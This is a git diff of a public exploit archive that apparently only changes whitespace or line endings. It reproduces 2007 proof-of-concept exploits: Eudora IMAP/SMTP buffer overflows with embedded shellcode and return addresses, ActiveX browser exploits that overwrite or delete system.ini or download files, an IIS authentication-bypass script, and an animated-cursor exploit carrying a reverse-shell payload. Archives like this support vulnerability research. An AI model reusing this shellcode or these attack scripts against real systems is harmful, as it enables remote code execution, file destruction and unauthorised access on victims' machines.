-"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" -"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" -"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" -"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") - -opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) - -buf = "250-" -buf += "A" * 76 -buf += pack(" +# Tested on Eudora 7.1.0.9 / XP SP2 Polish +# Shellcode type: Windows Execute Command (calc.exe) +# Note:.. +# This vulnerability can be exploited only if user +# will ignore warning about "buffer overflow" error. 
+## + +from struct import pack +from time import sleep +from socket import * + +bind_addr = '0.0.0.0' +bind_port = 25 + +shellcode = ( +"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" +"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" +"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" +"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" +"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" +"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" +"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" +"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" +"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" +"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" +"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") + +opcode = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish) + +buf = "250-" +buf += "A" * 76 +buf += pack(" -

    2007/05/16

    ------------------------------------------------------------------------------------------------------ - IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite - url: http://www.precisionid.com/ - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 - all software that use this ocx are vulnerable to these exploits. - - If you try this exploit with IE 7, it just stops to answer ------------------------------------------------------------------------------------------------------ - - - - - - - - - -# milw0rm.com [2007-05-16] +
    +

    2007/05/16

    +----------------------------------------------------------------------------------------------------- + IE 6 PrecisionID Barcode ActiveX 1.9 0day (PrecisionID_Barcode.dll) Remote Arbitrary File Overwrite + url: http://www.precisionid.com/ + + author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not be responsible for any damage. + + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 6 + all software that use this ocx are vulnerable to these exploits. + + If you try this exploit with IE 7, it just stops to answer +----------------------------------------------------------------------------------------------------- + + + + + + + +
    + +# milw0rm.com [2007-05-16] diff --git a/platforms/windows/remote/3950.html b/platforms/windows/remote/3950.html index 24264d8e2..a25ad1dbf 100755 --- a/platforms/windows/remote/3950.html +++ b/platforms/windows/remote/3950.html @@ -1,61 +1,61 @@ -

    2007/05/18

    -
    ------------------------------------------------------------------------------------------------
    - LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow
    - url: http://www.leadtools.com/
    - peice: eheheh, take a look at thier site :)
    - 
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    -
    - This exploits just open calc.exe
    ------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-05-18] +

    2007/05/18

    +
    +-----------------------------------------------------------------------------------------------
    + LeadTools JPEG 2000 COM Objejct (LTJ2K14.ocx v. 14.5.0.35) Remote Stack-Based Buffer Overflow
    + url: http://www.leadtools.com/
    + peice: eheheh, take a look at thier site :)
    + 
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    +
    + This exploits just open calc.exe
    +-----------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-05-18] diff --git a/platforms/windows/remote/3951.html b/platforms/windows/remote/3951.html index 401d60b44..f39246605 100755 --- a/platforms/windows/remote/3951.html +++ b/platforms/windows/remote/3951.html @@ -1,64 +1,64 @@ -

    2007/05/19

    -
    -----------------------------------------------------------------------------------------------------
    - LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
    - url: http://www.leadtools.com/
    - peice: eheheh, take a look at thier site :)
    - 
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    -
    - This exploits just open calc.exe
    -----------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-05-18] +

    2007/05/19

    +
    +----------------------------------------------------------------------------------------------------
    + LeadTools Thumbnail Browser Control (lttmb14E.ocx v. 14.5.0.44) Remote Stack-Based Buffer Overflow
    + url: http://www.leadtools.com/
    + peice: eheheh, take a look at thier site :)
    + 
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    +
    + This exploits just open calc.exe
    +----------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-05-18] diff --git a/platforms/windows/remote/3952.html b/platforms/windows/remote/3952.html index a8c993c7b..70232d8f9 100755 --- a/platforms/windows/remote/3952.html +++ b/platforms/windows/remote/3952.html @@ -1,64 +1,64 @@ -

    2007/05/20

    -
    -----------------------------------------------------------------------------------------------------------
    - LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
    - url: http://www.leadtools.com/
    - peice: eheheh, take a look at thier site :)
    - 
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    -
    - Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    -
    - This exploits just open calc.exe
    -----------------------------------------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-05-18] +

    2007/05/20

    +
    +----------------------------------------------------------------------------------------------------------
    + LeadTools Raster Thumbnail Object Library (LTRTM14e.DLL v. 14.5.0.44) Remote Stack-Based Buffer Overflow
    + url: http://www.leadtools.com/
    + peice: eheheh, take a look at thier site :)
    + 
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    +
    + Tested on Windows XP Professional SP2 full patched with Internet Explorer 7
    +
    + This exploits just open calc.exe
    +----------------------------------------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-05-18] diff --git a/platforms/windows/remote/3961.html b/platforms/windows/remote/3961.html index 7033d2537..efdd148a9 100755 --- a/platforms/windows/remote/3961.html +++ b/platforms/windows/remote/3961.html @@ -1,45 +1,45 @@ -
    -

    2007/05/21

    ------------------------------------------------------------------------------------------------------ - LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite - url: http://www.leadtools.com/ - price: eheheh, take a look at thier site :) - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - all software that use this ocx are vulnerable to this exploits. ------------------------------------------------------------------------------------------------------ - - - - - - - -
    - -# milw0rm.com [2007-05-21] +
    +

    2007/05/21

    +----------------------------------------------------------------------------------------------------- + LeadTools Raster Variant Object Library (LTRVR14e.dll v. 14.5.0.44) Remote Arbitrary File Overwrite + url: http://www.leadtools.com/ + price: eheheh, take a look at thier site :) + + author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not be responsible for any damage. + + THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 + all software that use this ocx are vulnerable to this exploits. +----------------------------------------------------------------------------------------------------- + + + + + + + +
    + +# milw0rm.com [2007-05-21] diff --git a/platforms/windows/remote/3966.php b/platforms/windows/remote/3966.php index a4653e9d8..66d1ee00c 100755 --- a/platforms/windows/remote/3966.php +++ b/platforms/windows/remote/3966.php @@ -1,60 +1,60 @@ - - - -"; -?> - - - -# milw0rm.com [2007-05-21] + + + +"; +?> + + + +# milw0rm.com [2007-05-21] diff --git a/platforms/windows/remote/3967.html b/platforms/windows/remote/3967.html index fb772b13d..cfee6fdbb 100755 --- a/platforms/windows/remote/3967.html +++ b/platforms/windows/remote/3967.html @@ -1,22 +1,22 @@ - - - - - - -# milw0rm.com [2007-05-21] + + + + + + +# milw0rm.com [2007-05-21] diff --git a/platforms/windows/remote/3968.html b/platforms/windows/remote/3968.html index 93e896dfa..6939aeb9b 100755 --- a/platforms/windows/remote/3968.html +++ b/platforms/windows/remote/3968.html @@ -1,108 +1,108 @@ - - - - - www.ksign.com - KSignSWAT SWAT_Login() PoC code - - - - - - - - - -# milw0rm.com [2007-05-22] + + + + + www.ksign.com - KSignSWAT SWAT_Login() PoC code + + + + + + + + + +# milw0rm.com [2007-05-22] diff --git a/platforms/windows/remote/3982.html b/platforms/windows/remote/3982.html index 291b94d77..d5b760444 100755 --- a/platforms/windows/remote/3982.html +++ b/platforms/windows/remote/3982.html @@ -1,36 +1,36 @@ - - - - - - -# milw0rm.com [2007-05-24] + + + + + + +# milw0rm.com [2007-05-24] diff --git a/platforms/windows/remote/4008.html b/platforms/windows/remote/4008.html index e0ed58405..8dfcbf2b6 100755 --- a/platforms/windows/remote/4008.html +++ b/platforms/windows/remote/4008.html @@ -1,32 +1,32 @@ -
    -

    2007/05/30

    -------------------------------------------------------------------------------------------- - Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit - url: http://www.programchecker.com/activeintro.aspx - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - all software that use this ocx are vulnerable to this exploits. - - Using the "DownloadFile" method, you can download everything you want on a pc. This - exploit just download a txt file on pc, I try to overwrite cmd.exe and it works. -------------------------------------------------------------------------------------------- - - - - - - - -
    - -# milw0rm.com [2007-05-30] +
    +

    2007/05/30

    +------------------------------------------------------------------------------------------- + Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit + url: http://www.programchecker.com/activeintro.aspx + + author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 + all software that use this ocx are vulnerable to this exploits. + + Using the "DownloadFile" method, you can download everything you want on a pc. This + exploit just download a txt file on pc, I try to overwrite cmd.exe and it works. +------------------------------------------------------------------------------------------- + + + + + + + +
    + +# milw0rm.com [2007-05-30] diff --git a/platforms/windows/remote/4010.html b/platforms/windows/remote/4010.html index 574e8d238..561df6971 100755 --- a/platforms/windows/remote/4010.html +++ b/platforms/windows/remote/4010.html @@ -1,49 +1,49 @@ -
    -

    2007/05/28

    ------------------------------------------------------------------------------------------------ - EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Unsafe Method Vulnerability - url: http://www.ocxt.com/officeviewer.php - - author: shinnai - mail: shinnai[at]autistici[dot]org - site: http://shinnai.altervista.org - - This was written for educational purpose. Use it at your own risk. - Author will be not be responsible for any damage. - - THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF - IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! - - Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 - all software that use this ocx are vulnerable to this exploits. - - This ActiveX is marked as: - RegKey Safe for Script: True - RegKey Safe for Init: True - KillBitSet: False ------------------------------------------------------------------------------------------------ - - - - - - - -
    - -# milw0rm.com [2007-05-30] +
    +

    2007/05/28

    +----------------------------------------------------------------------------------------------- + EDraw Office Viewer Component (edrawofficeviewer.ocx v. 4.0.5.20) Unsafe Method Vulnerability + url: http://www.ocxt.com/officeviewer.php + + author: shinnai + mail: shinnai[at]autistici[dot]org + site: http://shinnai.altervista.org + + This was written for educational purpose. Use it at your own risk. + Author will be not be responsible for any damage. + + THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF + IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART! + + Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 + all software that use this ocx are vulnerable to this exploits. + + This ActiveX is marked as: + RegKey Safe for Script: True + RegKey Safe for Init: True + KillBitSet: False +----------------------------------------------------------------------------------------------- + + + + + + + +
    + +# milw0rm.com [2007-05-30] diff --git a/platforms/windows/remote/4014.py b/platforms/windows/remote/4014.py index b0936ec9e..959ee919e 100755 --- a/platforms/windows/remote/4014.py +++ b/platforms/windows/remote/4014.py 
@@ -1,116 +1,116 @@ -#!/usr/bin/python -# Eudora 7.1 (IMAP FLAGS) 0day Remote SEH Overwrite PoC Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on Eudora 7.1.0.9 / 2k SP4 Polish -# Shellcode type: Windows Execute Command (calc.exe) -# Details:.. -# Eudora --> SELECT IMBOX ---------> IMAP server -# Eudora <-- FLAGS (\..AAAA...) <---- IMAP server -# FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070 -# 0x41414141 Pointer to next SEH record -# 0x41414141 SE handler -## - -from thread import start_new_thread -from struct import pack -from string import find -from time import sleep -from socket import * - -session_elements = ( -'* OK IMAP4 ready\r\n', - -'* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP' -'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED' -'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR\r\n' -'00000 OK completed\r\n', - -'00001 OK User logged in\r\n', - -'* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n' -'00002 OK Completed\r\n', - -'* LIST (\Noselect) "." ""\r\n' -'00003 OK Completed (0.000 secs 0 calls)\r\n', - -'* LIST (\HasChildren) "." "INBOX"\r\n' -'00004 OK Completed (0.000 secs 3 calls)\r\n', - -'* LIST (\HasChildren) "." "INBOX"\r\n' -'00005 OK Completed (0.000 secs 3 calls)\r\n', - -'* FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt%s)\r\n' -'* OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt \*)]\r\n' -'* 1 EXISTS\r\n' -'* 0 RECENT\r\n' -'* OK [UIDVALIDITY 1180222864]\r\n' -'* OK [UIDNEXT 2]\r\n' -'* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n' -'* OK [URLMECH INTERNAL]\r\n' -'00003 OK [READ-WRITE] Completed\r\n') - -shellcode = ( -# Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 
0x7B) -# EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" -"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54" -"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53" -"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a" -"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43" -"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" -"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49" -"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" -"\x4e\x36\x43\x36\x42\x50\x5a") - -NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 -SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) - -buf = "A" * 1062 -buf += pack(" +# Tested on Eudora 7.1.0.9 / 2k SP4 Polish +# Shellcode type: Windows Execute Command (calc.exe) +# Details:.. +# Eudora --> SELECT IMBOX ---------> IMAP server +# Eudora <-- FLAGS (\..AAAA...) 
<---- IMAP server +# FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt + "A" * 1070 +# 0x41414141 Pointer to next SEH record +# 0x41414141 SE handler +## + +from thread import start_new_thread +from struct import pack +from string import find +from time import sleep +from socket import * + +session_elements = ( +'* OK IMAP4 ready\r\n', + +'* CAPABILITY IMAP4 IMAP4rev1 ACL QUOTA LITERAL+ MAILBOX-REFERRALS NAMESPACE UIDP' +'LUS ID NO_ATOMIC_RENAME UNSELECT CHILDREN MULTIAPPEND BINARY SORT THREAD=ORDERED' +'SUBJECT THREAD=REFERENCES ANNOTATEMORE IDLE SASL-IR\r\n' +'00000 OK completed\r\n', + +'00001 OK User logged in\r\n', + +'* NAMESPACE (("INBOX." ".")) (("user." ".")) (("" "."))\r\n' +'00002 OK Completed\r\n', + +'* LIST (\Noselect) "." ""\r\n' +'00003 OK Completed (0.000 secs 0 calls)\r\n', + +'* LIST (\HasChildren) "." "INBOX"\r\n' +'00004 OK Completed (0.000 secs 3 calls)\r\n', + +'* LIST (\HasChildren) "." "INBOX"\r\n' +'00005 OK Completed (0.000 secs 3 calls)\r\n', + +'* FLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt%s)\r\n' +'* OK [PERMANENTFLAGS (\Answered \Flagged \Draft \Deleted \Seen hasatt \*)]\r\n' +'* 1 EXISTS\r\n' +'* 0 RECENT\r\n' +'* OK [UIDVALIDITY 1180222864]\r\n' +'* OK [UIDNEXT 2]\r\n' +'* OK [NOMODSEQ] Sorry, modsequences have not been enabled on this mailbox\r\n' +'* OK [URLMECH INTERNAL]\r\n' +'00003 OK [READ-WRITE] Completed\r\n') + +shellcode = ( +# Restricted Characters: 0x0a, 0x0d, 0x20, 0x29, (0x60 .. 
0x7B) +# EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x50\x42\x50\x4b\x58\x45\x44\x4e\x33\x4b\x48\x4e\x57" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x58" +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x58" +"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" +"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x54" +"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x48" +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x53" +"\x42\x4c\x46\x56\x4b\x38\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a" +"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x35\x41\x43" +"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" +"\x42\x35\x4a\x56\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x56\x4a\x49" +"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x36" +"\x4e\x36\x43\x36\x42\x50\x5a") + +NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 +SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) + +buf = "A" * 1062 +buf += pack(" - - - - - -# milw0rm.com [2007-05-31] + + + + + + +# milw0rm.com [2007-05-31] diff --git a/platforms/windows/remote/4016.sh b/platforms/windows/remote/4016.sh index aea8ab91e..3bcb47206 100755 --- a/platforms/windows/remote/4016.sh +++ b/platforms/windows/remote/4016.sh 
@@ -1,19 +1,19 @@
-#!/bin/sh
-#
-# NTLM && BASIC AUTH BYPASS :)
-#
-# sha0[at]badchecksum.net
-# Based on my adv: http://www.securityfocus.com/bid/24105/info (CVE-2007-2815)
-
-if [ $# != 2 ]
-then
- printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
- exit 0
-fi
-
-site=$1
-protectedObject=$2
-evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
-lynx -dump $evil
-
-# milw0rm.com [2007-05-31]
+#!/bin/sh
+#
+# NTLM && BASIC AUTH BYPASS :)
+#
+# sha0[at]badchecksum.net
+# Based on my adv: http://www.securityfocus.com/bid/24105/info (CVE-2007-2815)
+
+if [ $# != 2 ]
+then
+ printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";
+ exit 0
+fi
+
+site=$1
+protectedObject=$2
+evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
+lynx -dump $evil
+
+# milw0rm.com [2007-05-31]
diff --git a/platforms/windows/remote/4021.html b/platforms/windows/remote/4021.html
index bc5430948..a62bf5ed5 100755
--- a/platforms/windows/remote/4021.html
+++ b/platforms/windows/remote/4021.html
@@ -1,59 +1,59 @@
-
    -------------------------------------------------------------------------
    - Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
    - url: http://www.programchecker.com/activeintro.aspx
    - 
    - original advisory: http://secunia.com/advisories/25473/
    - Will Dormann, CERT/CC, is credited with the discovery of these issues
    -
    - author: shinnai
    - mail: shinnai[at]autistici[dot]org
    - site: http://shinnai.altervista.org
    - 
    - Tested on Windows XP Professional SP2 all patched, with Internet
    - Explorer 7
    -------------------------------------------------------------------------
    -
    -
    -
    -
    -
    -
    -
    -
    -
    - -# milw0rm.com [2007-06-01] +
    +------------------------------------------------------------------------
    + Zenturi ProgramChecker ActiveX (sasatl.dll) Remote Buffer Overflow PoC
    + url: http://www.programchecker.com/activeintro.aspx
    + 
    + original advisory: http://secunia.com/advisories/25473/
    + Will Dormann, CERT/CC, is credited with the discovery of these issues
    +
    + author: shinnai
    + mail: shinnai[at]autistici[dot]org
    + site: http://shinnai.altervista.org
    + 
    + Tested on Windows XP Professional SP2 all patched, with Internet
    + Explorer 7
    +------------------------------------------------------------------------
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + +# milw0rm.com [2007-06-01] diff --git a/platforms/windows/remote/4042.html b/platforms/windows/remote/4042.html index 6eb1e51d2..58651d1fb 100755 --- a/platforms/windows/remote/4042.html +++ b/platforms/windows/remote/4042.html @@ -1,44 +1,44 @@ - - - - - - -sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111 - -# milw0rm.com [2007-06-07] + + + + + + +sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111 + +# milw0rm.com [2007-06-07] diff --git a/platforms/windows/remote/4043.html b/platforms/windows/remote/4043.html index 7f6f6107c..2080b03e2 100755 --- a/platforms/windows/remote/4043.html +++ b/platforms/windows/remote/4043.html @@ -1,40 +1,40 @@ -This affects the viewer ywcvwr.dll with yahoo messenger - latest version tested. - Fixed bug in last post - (x=0;xi<800;x++) should be (x=0; x<800; x++) - - Here is your 2nd 0day!!! - link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 - - - - - - -# milw0rm.com [2007-06-07] +This affects the viewer ywcvwr.dll with yahoo messenger + latest version tested. + Fixed bug in last post + (x=0;xi<800;x++) should be (x=0; x<800; x++) + + Here is your 2nd 0day!!! + link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856 + + + + + + +# milw0rm.com [2007-06-07] diff --git a/platforms/windows/remote/4045.py b/platforms/windows/remote/4045.py index 0c5a73272..656c362d2 100755 --- a/platforms/windows/remote/4045.py +++ b/platforms/windows/remote/4045.py 
@@ -1,292 +1,292 @@ -#!/usr/bin/env python - -# -# $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $ -# -# Windows Animated Cursor Stack Overflow Exploit -# Copyright 2007 Ramon de Carvalho Valle , -# RISE Security -# -# This program is free software; you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation; either version 2 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -# - -# -# Windows Animated Cursor Stack Overflow Vulnerability -# http://www.determina.com/security.research/vulnerabilities/ani-header.html -# - -from BaseHTTPServer import * -from os.path import * -from random import * -from socket import * -from string import * -from struct import * -from sys import * - -# -# windows/shell_reverse_tcp - 287 bytes -# http://www.metasploit.com -# EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1 -# -buf = \ -'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \ -'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \ 